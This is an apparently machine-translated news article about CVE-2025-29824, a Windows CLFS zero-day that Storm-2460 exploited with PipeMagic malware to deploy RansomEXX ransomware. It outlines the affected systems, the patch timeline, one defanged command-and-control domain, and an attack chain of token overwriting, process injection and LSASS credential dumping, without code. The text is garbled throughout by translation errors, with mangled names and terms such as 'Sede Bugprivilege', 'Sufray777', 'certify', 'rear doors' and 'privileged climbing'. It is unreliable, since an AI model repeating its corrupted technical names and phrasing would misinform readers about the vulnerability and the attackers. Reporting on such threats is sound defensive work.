Microsoft has detected a zero day vulnerability in the common Windows (CLFS) registration file system that is exploited in nature to implement ransomware. The objective industries include IT, real estate, finance, software and retail, with companies based in the United States, Spain, Venezuela and Saudi Arabia.
Vulnerability, tracked as CVE-2025-29824 and qualified as “important”, is present in the CLFS nucleus controller. It allows an attacker who already has standard access to a user to a system intensifies their local privileges. The individual can use their privileged access for “generalized implementation and detonation of ransomware within an environment”, according to a blog post from the Microsoft threat intelligence center.
The CFLS controller is a key Windows element used to write transaction records, and its misuse could allow an attacker to obtain system privileges. From there, they could steal data or install rear doors. Microsoft often discovers privileged climbing failures in CFL, the last one is parked in December.
In cases of exploitation CVE-2025-29824 observed by Microsoft, the so-called “pipemagic” malware was deployed before the attackers could exploit vulnerability to increase their privileges. Pipemagic offers remote control attackers on a system and allows them to run commands or install more malicious tools.
See: Techrepublic Exclusive: New ransomware attacks are becoming more personal as hackers apply psychological pressure '
Who is behind the exploitation?
Microsoft has identified Storm-2460 as the threat actor that exploits this vulnerability with Pipemagic and Ransomware, which links it to the Ransomexx group.
Once known as Sufray777, the attackers entered the scene in 2018. Since then, they have attacked high -profile organizations such as the Texas Department of Transportation, the Brazilian government and the Hardware Manufacturer Taiwanés Gigabyte. The group has been linked to Russian citizens.
The United States cyber agency has added vulnerability with classification of 7.8 to its list of known exploited vulnerabilities, which means that federal civil agencies must apply the patch before April 29.
Windows 10, Windows 11 and Windows Server are vulnerable
On April 8, security updates were published to patch vulnerability in Windows 11, Windows Server 2022 and Windows Server 2019. The systems based in Windows 10 x64 and 32 bits still expect corrections, but Redmond says that they will launch “as soon as possible”, and “customers will be notified through a review of this CVE information” as soon as I are.
Devices that run Windows 11 version 24h2 or newer cannot be exploited in this way, even if vulnerability exists. Access to information on the required system is restricted to users with the permission of “Sede Bugprivilege”, an access level that is generally not available for standard users.
How exploitation works
Microsoft watched the threat actors that use the usefulness of the certify command line to download a malicious MSBUild file in the victim's system.
This file, which carried a Pypemagic Useful load, was available on a third -party website that had been committed to the malware of the threat actor. A PIPEMAGIC DOMAIN COMMUNICATED WAS AAAAABBBBBBB.ASTUS.cloudapp.azure[.]com, which has now been disabled.
Once Pipemagic was deciphered and executed in the memory, the attackers used a dllhost.exe process to filter core addresses, or memory locations, user mode. They overwrite the token of the process, which defines what the process can do, with the 0xffffffff value value, granting complete privileges and allowing the attackers to inject code into processes at the system level.
They then injected a payload into the system Winlogon.exe of the system, which subsequently injected the Sysinternals procdump.exe tool in another dllhost.exe process and executed it. This allowed the threat actor to turn the memory of LSass, a process that contains user credentials.
After the theft of credentials, ransomware was implemented. Microsoft observed encrypted files, an aggregate random extension and a rescue note called! _Read_me_rexx2 _!. Txt was reduced in the affected systems.
